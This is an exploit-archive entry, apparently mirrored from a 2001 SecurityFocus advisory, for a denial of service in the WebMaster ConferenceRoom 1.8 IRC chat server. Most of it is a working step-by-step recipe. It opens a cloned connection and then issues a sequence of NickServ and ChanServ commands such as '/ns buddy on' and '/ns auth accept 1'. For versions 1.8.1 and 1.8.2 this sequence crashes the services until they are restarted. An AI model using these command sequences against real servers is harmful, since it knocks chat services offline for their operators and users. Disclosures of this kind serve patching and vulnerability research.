WebMaster ConferenceRoom 1.8 Developer Edition - Denial of Service

2001-01-10T00:00:00
ID EXPLOITPACK:FFDF08AA8C8E13FBA7EC1BBFD757F8DD
Type exploitpack
Reporter Murat - 2
Modified 2001-01-10T00:00:00

Description

WebMaster ConferenceRoom 1.8 Developer Edition - Denial of Service

                                        
                                            source: https://www.securityfocus.com/bid/2178/info

WebMaster ConferenceRoom Developer Edition is a chat package which enables a large community of users to chat together. ConferenceRoom has a wide range of capabilities and a user friendly channel moderation feature.

It is possible to cause a denial of service in ConferenceRoom. By making duplicate connections and executing special server commands in both sessions, ConferenceRoom will crash and refuse any new connections. A restart of the service is required in order to gain normal functionality. 

ConferenceRoom 1.8.1:

Make to connections to the irc server second being the clone of other. On second connection (clone) type "/ns buddy on". on first connection type "/ns buddy add <clone client nickname>". on clone type "/ns auth accept 1" and the services crashes.

ConferenceRoom 1.8.2:

"/ns buddy on" can't run, cuz professional edt. can't support "buddy" command. Register it one channel, and type it commands "/ns set authorize chanlists on", "/cs aop <#ChannelName> add <NickName>", "/ns auth accept 1". and the services crashes.